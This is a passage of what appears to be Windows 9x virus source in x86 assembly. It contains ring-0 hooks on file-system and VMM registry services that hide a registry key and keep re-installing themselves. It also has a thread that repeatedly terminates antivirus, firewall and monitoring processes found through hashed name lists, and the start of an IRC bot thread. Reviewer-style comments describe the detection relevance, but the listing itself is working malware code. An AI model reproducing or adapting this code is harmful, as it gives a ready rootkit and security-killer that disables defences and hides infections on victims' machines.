29a-7.020
push eax
push eax
VxDcall IFSMGR, InstallFileSystemApiHook
add esp, 4
pop edi
push edi
add edi, __old_hook-stealthsplore_start
stosd
push IFSMGR
pop eax
VMMcall Get_DDB
pop esi
test ecx, ecx
jz __end
push esi
add esi, IFSApiHook_hook-stealthsplore_start
mov ebx, InstallFileSystemApiHook
call hook_service
;pop edi ; uncomment this if u want to to use IFSApiHook..
;push edi
;xchg esi, [edi+_origifshook-stealthsplore_start]
pop esi
push esi
add esi, Ring0_FileIO_hook-stealthsplore_start
mov ebx, Ring0_FileIO
call hook_service
pop edi
xchg esi, [edi+_orig_Ring0_FileIO-stealthsplore_start]
__end: popa
retf
stealthsplore_start: push ebx ; u have no fuckin idea how much gpf did it took me
; to realize that ebx modification fucks-up kernel..
call $+5
_sploredlta: pop ebx
_STLTH2_ equ <-_sploredlta[ebx]>
__quit: db 0beh
__old_hook dd ?
movzx ecx, (ifs_first_run _STLTH2_).byte ptr 0
jecxz __continue
dec (ifs_first_run _STLTH2_).byte ptr 0
lodsd
__find_sys: lodsd
xchg eax, esi
lodsd
xchg eax, ecx
lodsd
cmp eax, ecx
jnz __find_sys
mov (sys_handler _STLTH2_).dword ptr 0, eax
__continue:
mov eax, (sys_handler _STLTH2_).dword ptr 0
pop ebx
jmp eax
IFSApiHook_hook:
; db 0beh ; uncoment this if u want to use this shit somehow..
;_origifshook dd ?
xor eax, eax ; no hook 4u, mister file-wanna-monitor
retn
Ring0_FileIO_hook: push esi
db 0beh
_orig_Ring0_FileIO dd 0
push esi
mov esi, [esp+4]
pusha
call $+5
_r0ifshookdlta: pop ebx
_IFSr0HOOK equ <-_r0ifshookdlta[ebx]>
cmp eax, R0_OPENCREATFILE
jnz __done_cmp
lea edi, _this_name _IFSr0HOOK
dec edi
mov ecx, __this_length _IFSr0HOOK
__do_cmp: lodsb
test al, al
jz __done_cmp
inc edi
cmp al, byte ptr [edi]
loopz __do_cmp
popa
stc
; stealth? either an ifs driver file corruption occured on my haed drive, or non of those r3 file interfaces r
; connected with this... atm, i have no fuckin desire to investigate this further. r0 on w9x sucks!!!
retn
__done_cmp: popa
retn 4
ifs_flag db 0
ifs_first_run db 1
sys_handler dd 0
_this_name db MAX_PATH dup(0)
__this_length dd 0
stealthsplore_size equ $-stealthsplore_start
stealth_thread2 endp
;-----------------------------------------------------------------------
; stealth_thread (pascal) — ring-3 thread that hands __ring0_code to
; call_in_ring0 (defined elsewhere) and then spins forever (jmp $).
; Uses the call $+5 / pop ebx delta trick; _STLTH rebases labels on ebx.
;
; What the ring-0 part (__ring0_code) does, all visible below:
;   1. PageAllocate: (stealthcode_size+4095)/4096 PG_SYS pages,
;      PAGEFIXED or PAGEZEROINIT.
;   2. PageModifyPermissions: AND-mask clears PC_WRITEABLE and PC_USER,
;      so the copy is not reachable from ring 3.
;   3. rep movsb: copies stealthcode_start..+stealthcode_size into it.
;   4. Get_DDB with eax=1 (presumably VMM's own device id); the dword
;      at [DDB+30h] (looks like DDB_Service_Table_Ptr — confirm) is
;      stored into service_ptr_table for DDB_regenarate.
;   5. HOOK_SERVICE (macro, not shown here) on five services:
;      _RegEnumKey, _RegOpenKey, _RegCreateKey, _RegDeleteKey, Hook_DS.
;
; Detection relevance: the observable state is five VMM service-table
; entries redirected into an anonymous PG_SYS page. Every hook below
; calls DDB_regenarate first, which re-writes all five entries on each
; call, so a one-off restore of the table does not stick.
;-----------------------------------------------------------------------
stealth_thread proc pascal
call $+5
stealthdlta: pop ebx
_STLTH equ <-stealthdlta[ebx]>
lea esi, __ring0_code _STLTH
call call_in_ring0
jmp $                                   ; ring-3 side never continues
; --- executed in ring 0 via call_in_ring0; returns with retf ---
__ring0_code: pusha
push PAGEFIXED or PAGEZEROINIT ; flags
xor eax, eax
push eax ; *PhysAddr
push eax ; maxPhys
push eax ; minPhys
push eax ; AlignMask
push eax ; handle of VM (==0 if PG_SYS)
push PG_SYS ; pType
push (stealthcode_size+4095) shr 12 ; nPages
VMMcall PageAllocate
add esp, 8*4
mov [esp.Pushad_eax], eax ; eax = mem handle
push PC_STATIC ; OR_MASK
push not (PC_WRITEABLE+PC_USER) ; AND_MASK
push (stealthcode_size+4095) shr 12
shr eax, 12                             ; handle -> page number
push eax
VMMcall PageModifyPermissions ; make pages inaccessible from ring3
add esp, 4*4
mov edi, [esp.Pushad_eax] ; copy some stealthcode
push edi                                ; keep destination for later
lea esi, stealthcode_start _STLTH
mov ecx, stealthcode_size
rep movsb
push 1
pop eax                                 ; eax = 1 -> device id for Get_DDB
VMMcall Get_DDB
test ecx, ecx                           ; ecx = DDB or 0
jz __end                                ; NOTE: leaves the pushed edi on the stack
pop eax                                 ; eax = copied code base
mov edx, [ecx+30h]                      ; service table pointer of that DDB (see header)
mov [eax+service_ptr_table-stealthcode_start], edx
HOOK_SERVICE _RegEnumKey
HOOK_SERVICE _RegOpenKey
HOOK_SERVICE _RegCreateKey
HOOK_SERVICE _RegDeleteKey
HOOK_SERVICE Hook_DS ; bye bye regmon... :)
NUMBA_HOOKED_SERVICES equ 5             ; must match the pair count in DDB_regenarate
__end: popa
r0__err: retf
; --- everything from here to stealthcode_size is copied into the PG_SYS page ---
stealthcode_start:
;-----------------------------------------------------------------------
; hook_RegEnumKey — replacement for VMM _RegEnumKey (C calling conv).
; Calls the original (real_RegEnumKey, imm32 patched into "mov eax,imm")
; and then, if lpszName is non-null and its first 8 bytes equal the two
; hard-coded 4-byte constants below, replaces the result with
; ERROR_NO_MORE_ITEMS, i.e. the matching subkey disappears from
; enumeration. Result is returned through the Pushad_eax slot.
;-----------------------------------------------------------------------
hook_RegEnumKey proc c
arg hKey:DWORD
arg iSubKey:DWORD
arg lpszName:DWORD
arg cchName:DWORD
pushf
pusha
call DDB_regenarate                     ; re-apply all hooks first
push cchName
push lpszName
push iSubKey
push hKey
db 0b8h                                 ; mov eax, real_RegEnumKey
real_RegEnumKey dd ?
call eax
add esp, 4*4
xchg eax, ebx                           ; ebx = original return code
lea esi, lpszName
lodsd
xchg eax, ecx                           ; ecx = lpszName
jecxz __1
cmp [ecx], "oivE"                       ; bytes 0..3 of the returned name
jnz __1
cmp [ecx+4], "snIn"                     ; bytes 4..7
jnz __1
mov ebx, ERROR_NO_MORE_ITEMS            ; hide this entry
__1: mov [esp.Pushad_eax], ebx
popa
popf
ret
hook_RegEnumKey endp
;-----------------------------------------------------------------------
; hook_RegOpenKey — replacement for VMM _RegOpenKey.
; @endsz (macro, not shown) presumably advances esi to the end of
; lpszSubKey; the last 8 bytes before the terminator are compared with
; two hard-coded constants and, on match, ERROR_BADKEY is returned
; without calling the original. Otherwise the call is passed through.
;-----------------------------------------------------------------------
hook_RegOpenKey proc c
arg hkey
arg lpszSubKey
arg phkResult
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx                           ; ecx = lpszSubKey
jecxz __open_key                        ; null name: pass through
xchg ecx, esi
@endsz
cmp [esi-5], "llat"                     ; tail of the hidden key name
jnz __open_key
cmp [esi-9], "snIn"
jnz __open_key
mov eax, ERROR_BADKEY
jmp __end
__open_key: push phkResult
push lpszSubKey
push hkey
db 0b8h                                 ; mov eax, real_RegOpenKey
real_RegOpenKey dd ?
call eax
add esp, 3*4
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegOpenKey endp
;-----------------------------------------------------------------------
; hook_RegCreateKey — same filter as hook_RegOpenKey (ERROR_BADKEY for
; the hidden name), otherwise passes through to real_RegCreateKey.
;-----------------------------------------------------------------------
hook_RegCreateKey proc c
arg hkey
arg lpszSubKey
arg phkResult
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx
jecxz __create_key
xchg ecx, esi
@endsz
cmp [esi-5], "llat"
jnz __create_key
cmp [esi-9], "snIn"
jnz __create_key
mov eax, ERROR_BADKEY
jmp __end
__create_key: push phkResult
push lpszSubKey
push hkey
db 0b8h                                 ; mov eax, real_RegCreateKey
real_RegCreateKey dd ?
call eax
add esp, 3*4
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegCreateKey endp
;-----------------------------------------------------------------------
; hook_RegDeleteKey — same filter, but answers ERROR_FILE_NOT_FOUND so
; the hidden key cannot be deleted through this service.
;-----------------------------------------------------------------------
hook_RegDeleteKey proc c
arg hKey
arg lpszSubKey
pushf
pusha
call DDB_regenarate
lea esi, lpszSubKey
lodsd
xchg eax, ecx
jecxz __del_key
xchg ecx, esi
@endsz
cmp [esi-5], "llat"
jnz __del_key
cmp [esi-9], "snIn"
jnz __del_key
mov eax, ERROR_FILE_NOT_FOUND
jmp __end
__del_key: push lpszSubKey
push hKey
db 0b8h                                 ; mov eax, real_RegDeleteKey
real_RegDeleteKey dd ?
call eax
add esp, 8
__end: mov [esp.Pushad_eax], eax
popa
popf
ret
hook_RegDeleteKey endp
;-----------------------------------------------------------------------
; hookHook_DS — replacement for Hook_Device_Service. Looks at the low
; 16 bits of eax (service number): anything in
; [_RegOpenKey, _RegSetValueEx] or equal to Hook_Device_Service is
; refused (returns with CF=1), so a monitor cannot hook the registry
; services or re-hook the hooker. Other requests fall through to
; __ok_hook with CF=0.
; NOTE(review): on the __ok_hook path the value loaded from realHook_DS
; into eax is discarded by the following popa; how control reaches the
; original service from here depends on the HOOK_SERVICE stub, which
; is not shown — confirm.
;-----------------------------------------------------------------------
hookHook_DS proc c
pusha
call DDB_regenarate
movzx ecx, ax
cmp ecx, _RegOpenKey
jb __check_hook
cmp ecx, _RegSetValueEx
ja __ok_hook
__bad_hook: popa
stc                                     ; CF=1: refuse the hook request
ret
__check_hook: cmp ecx, Hook_Device_Service
jz __bad_hook
__ok_hook: db 0b8h                      ; mov eax, realHook_DS
realHook_DS dd ?
mov [esp.Pushad_esi], esi
popa
ret
hookHook_DS endp
;-----------------------------------------------------------------------
; DDB_regenarate — re-writes the five hooked service-table entries.
; edx = service_ptr_table (imm32 patched in ring 0 above). The
; "call __service_table" pushes the address of the inline table that
; follows it, which is popped into esi: NUMBA_HOOKED_SERVICES pairs of
; (service index, hook address). The @_xxx slots are presumably filled
; by the HOOK_SERVICE macro — confirm. Each pair does
; table[index] = hook, so any restore made by another party is undone
; the next time one of the hooks runs.
;-----------------------------------------------------------------------
DDB_regenarate proc c
pusha
db 0bah ; edx
service_ptr_table dd ?
call __service_table                    ; pushes &table, never returns here
dd _RegEnumKey
@_RegEnumKey dd ?
dd _RegOpenKey
@_RegOpenKey dd ?
dd _RegCreateKey
@_RegCreateKey dd ?
dd _RegDeleteKey
@_RegDeleteKey dd ?
dd Hook_DS
@Hook_DS dd ?
__service_table: pop esi                ; esi = &table
push NUMBA_HOOKED_SERVICES
pop ecx
__cycle: lodsd
xchg eax, ebx                           ; ebx = service index
lodsd                                   ; eax = hook address
mov [edx+ebx*4], eax
loop __cycle
popa
ret
DDB_regenarate endp
stealthcode_size equ $-stealthcode_start
stealth_thread endp
;-----------------------------------------------------------------------
; anti_av_thread (pascal) — never returns. Loop (__kill_av):
;   - EnumWindows with __av_win_enum (below) as the callback;
;   - CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS), Process32First /
;     Process32Next over every process except the current one;
;   - per process: take the basename of szExeFile (after the last '\'),
;     lowercase it (lowercase: defined elsewhere), hash the part before
;     the first '.' with  rol eax,7 ; xor al,[byte];
;   - skip if the hash is in good_namez; if it is in bad_namez,
;     OpenProcess(PROCESS_TERMINATE) + TerminateProcess;
;   - CloseHandle the snapshot, Sleep(50), repeat.
; The name tables are stored as 4-byte hashes (whash macro, not shown),
; not as strings, and searched with repnz scasd.
; Detection relevance: a process that every 50 ms takes a Toolhelp
; snapshot, opens other processes with PROCESS_TERMINATE and terminates
; them, and posts WM_QUIT to windows whose title contains one of the
; hashed substrings.
; Register use: ebx = delta base (_AV rebases labels on it); ebp = the
; frame for the locals declared here.
;-----------------------------------------------------------------------
anti_av_thread proc pascal
local wh
local buffer:byte:512
local pid
local p_handle
local p_entry:PROCESSENTRY32
call $+5
avdelta: pop ebx
_AV equ <-avdelta[ebx]>
mov __av_ebp_patch _AV, ebp             ; self-patch: callback restores ebp/ebx from these slots
mov __av_ebx_patch _AV, ebx
mov __av_ebp_patch_ _AV, ebp
__kill_av: push ebx
push 0
lea eax, __av_win_enum _AV
push eax
call _EnumWindows _AV
pop ebx
push 0
push TH32CS_SNAPPROCESS
call _CreateToolhelp32Snapshot _AV
inc eax                                 ; INVALID_HANDLE_VALUE (-1) -> 0
jz __end__snapshot
dec eax
mov p_handle, eax
lea ecx, p_entry
mov [ecx.dwSize], size PROCESSENTRY32
push ecx
push eax
call _Process32First _AV
__cycle_procs: test eax, eax            ; eax = BOOL from Process32First/Next
jz __proc_done
call _GetCurrentProcessId _AV
cmp eax, p_entry.th32ProcessID
jz __next_proc                          ; never touch own process
lea esi, p_entry.szExeFile
__slash: mov edx, esi                   ; edx = start of current path component
__endsz: lodsb
cmp al, '\'
jz __slash
test al, al
jnz __endsz
mov esi, edx                            ; esi = basename
call lowercase
mov edx, esi
xor eax, eax
__hasherize: rol eax, 7                 ; hash basename up to '.' or NUL
xor al, [edx]
inc edx
cmp byte ptr [edx], '.'
jz __out
cmp byte ptr [edx], 0
jnz __hasherize
__out: lea edi, good_namez _AV
mov ecx, good_namez_numba
repnz scasd
jz __next_proc                          ; whitelisted name: leave it alone
lea edi, bad_namez _AV
mov ecx, bad_namez_numba
repnz scasd
jnz __next_proc                         ; not in the kill list
push p_entry.th32ProcessID
push 0
push PROCESS_TERMINATE
call _OpenProcess _AV
push 0
push eax
call _TerminateProcess _AV
__next_proc: lea eax, p_entry
push eax
push p_handle
call _Process32Next _AV
jmp __cycle_procs
test eax, eax                           ; unreachable: the jmp above is unconditional
jnz __cycle
pop eax
__proc_done: push p_handle
call _CloseHandle _AV
__end__snapshot: push 50
call _Sleep _AV
jmp __kill_av                           ; loop forever
;-----------------------------------------------------------------------
; __av_win_enum — EnumWindows callback (stdcall: hwnd, lParam).
; ebp and ebx are restored from the values patched into the code above
; (org $-4 slots) so the outer frame's locals are reachable.
; Flow: GetWindowThreadProcessId -> pid (0: return); GetWindowTextA into
; buffer (512 bytes) -> ecx = length (0: return); lowercase; then for
; each of the av_names_numba entries slide a window of av_names_length[i]
; bytes over the title, hashing with  rol edx,7 ; xor dl,[byte], and
; compare with av_namez_hashes[i].
; No match: returns 1 (continue enumeration). Match (__found):
; PostMessageA(wh, WM_QUIT, 0, 0), Sleep(10), then
; OpenProcess(PROCESS_TERMINATE) + TerminateProcess on pid.
;-----------------------------------------------------------------------
__av_win_enum: push ebp
mov ebp, 0
org $-4
__av_ebp_patch dd ?                     ; imm32 of "mov ebp, 0" patched at thread start
mov eax, [esp.Pshd.Arg1]                ; hwnd
mov wh, eax
pop ebp
pusha
mov ebx, 0
org $-4
__av_ebx_patch dd ?
mov ebp, 0
org $-4
__av_ebp_patch_ dd ?
push ecx                                ; stack slot receives the process id
push esp
push wh
call _GetWindowThreadProcessId _AV
pop ecx
mov pid, ecx
jecxz __end__end
push 512
lea esi, buffer
push esi
push wh
call _GetWindowTextA _AV
xchg eax, ecx                           ; ecx = title length
jecxz __end__end
call lowercase
push ebx
mov edx, ecx                            ; edx = title length
mov ecx, av_names_numba
lea edi, av_namez_hashes _AV
lea ebx, av_names_length _AV
__process_string: pusha
mov ecx, edx
movzx ebx, [ebx].byte ptr 0             ; ebx = pattern length
sub ecx, ebx
inc ecx                                 ; ecx = number of window positions
js __too_lil_end                        ; title shorter than pattern
jecxz __too_lil_end
__cycle: push ebx
push esi
xor edx, edx
__hash: rol edx, 7                      ; hash ebx bytes starting at esi
xor dl, [esi]
lodsb
dec ebx
jnz __hash
pop esi
pop ebx
lodsb                                   ; advance window by one byte
cmp edx, [edi]
jz __found
loop __cycle
add [esp.Pushad_edi], 4                 ; next hash / next length after popa
inc [esp.Pushad_ebx]
popa
loop __process_string
__end__kend: pop ebx
__end__end: popa
push 1
pop eax                                 ; TRUE: keep enumerating
retn
__too_lil_end: popa
jmp __end__kend
__found: popa
pop ebx
xor esi, esi
push esi
push esi
push WM_QUIT
push wh
call _PostMessageA _AV
push 10
call _Sleep _AV
push pid
push esi
push PROCESS_TERMINATE
call _OpenProcess _AV
push esi
push eax
call _TerminateProcess _AV
popa
retn
; __end: no jump to this label is visible in this listing. It closes the
; current thread handle, starts a fresh anti_av_thread (Create_Thread:
; defined elsewhere; G is another delta macro, not shown) and exits.
__end: push (h_av_thread G).dword ptr 0
call _CloseHandle _AV
lea eax, anti_av_thread _AV
call Create_Thread ; BUG!!! FIXAJ rel. adr.
mov h_av_thread _AV, eax
push 0
call _ExitThread _AV
; Hashed window-title substrings; av_names_length below gives the byte
; length of each pattern, in the same order.
av_namez_hashes: whash <virus, anti, firewall, process, zonealarm, amon, nod32, blackice, kill98, norton>
whash <kv3000, cilin, av98, dr.web, trojan, winrescue, lockdown, avp, sophos, f-prot>
whash <mcafee, e-scan, kaspersky, kav, wintop, apispy, apimon, sysview, sysmon, apithunk>
whash <procdump>
av_names_numba equ ($-av_namez_hashes)/4
av_names_numba_start:
av_names_length db 5, 4, 8, 7, 9, 4, 5, 8, 6, 6
db 6, 5, 4, 6, 6, 9, 8, 3, 6, 6
db 6, 6, 9, 3, 6, 6, 6, 7, 6, 8
db 8
; Process basenames (hashed) that are never terminated.
good_namez: whash <kernel32, msgsrv32, mprexe, mmtask, mstask, explorer, internat, taskmon, systray, rundll>
whash <wmiexe, winoa386, system, [system|process], [system|idle|process], smss, os2ss, os2srv>
whash <csrss, winlogon, services, lsass, svchost, spoolsv, regsvc, ntvdm, cmd, taskmgr>
whash <nddeagnt, spoolss, rpcss, tapisrv, rasman>
good_namez_numba equ ($-good_namez)/4
; Process basenames (hashed) that are terminated when seen.
bad_namez: whash <pop3scan, nod32, nod32cc, amon, _avp32, _avpcc, npssvc, nresq32, nsched32>
whash <nschednt, nsplugin, nav, navapsvc, navapw32, navlu32, navrunr, navw32, _avpm, alertsvc>
whash <avp32, avpcc, avpm, n32scanw, navwnt, antivir, avpupd, avgctrl, avwin95, scan32, vshwin32>
whash <f-stopw, f-prot95, ackwin32, vettray, vet95, sweep95, pccwin98, iomon98, avptc, ave32>
whash <avconsol, fp-win, dvp95, f-agnt95, claw95, nvc95, scan, virus, lockdown2000, norton>
whash <mcafee, pcciomon, pccmain, pop3trap, webtrap, avsynmgr, vsstat, nmain, luall, lucomserver>
whash <iamapp, atrack, nisserv, rescue32, symproxysvc, nisum, pview95, webscanx, safeweb, icmon>
whash <cfinet, cfinet32, avp, zonealarm, wink, zapro, zatutor, vmon, zauinst, minilog>
whash <lockdown, ants, fast, guard, update, autoupdate, tc, spyxx, clean, drwatson>
whash <sfc, msinfo32, cleaner, lsetup, aupdate, lual, luinit, navstub, bootwarn, qconsole>
whash <qserver, navdx, undoboot, cfgwiz, moolive, tca, tcm, tds-3, ss3edit, anti_trojan>
whash <atcon, atupdater, atwatch, wgfe95, poproxy, nprotect, ndd32, mcagent, mcupdate, watchdog>
whash <taumon, iamaserv, sphinx, vsecomr, icload95, icsupp95, icloadnt, icsuppnt, frw, firewall>
whash <antivirus, blackice, blackd, wrctrl, wradmin, cleaner3, pcfwallicon, aplica32, cfiadmin>
whash <cfiaudit, tds2-98, tds2-nt, nvarch16, vsmain, persfw, pavproxy, mssmmc32, trjscan, defwatch>
whash <vpc42, rtvscn95, vptray, mgui, apvxdwin, fsav, agentsvr, rrguard, rescue, rshell>
whash <apimonitor, cleanpc, pstat, wintop, anti-trojan, borg2, iamserv, vsmon>
bad_namez_numba equ ($-bad_namez)/4
anti_av_thread endp
ircbot_thread: call $+5
bdelta: pop ebp
X equ <-bdelta[ebp]> ; all variables relative to bdelta will be accessed in form of: varname X
sub esp, 512
push esp
push 0101h
callb WSAStartup
add esp, 512
test eax, eax
jnz bot_end
IFDEF IRC_LOG
x_push eax, irclog.log~
mov edx, esp
xor eax, eax
push eax
push eax
push CREATE_ALWAYS
push eax
push FILE_SHARE_READ
push GENERIC_WRITE
push edx
callb CreateFileA ; create log file
x_pop
inc eax
jz bot_end
dec eax
call $+5+4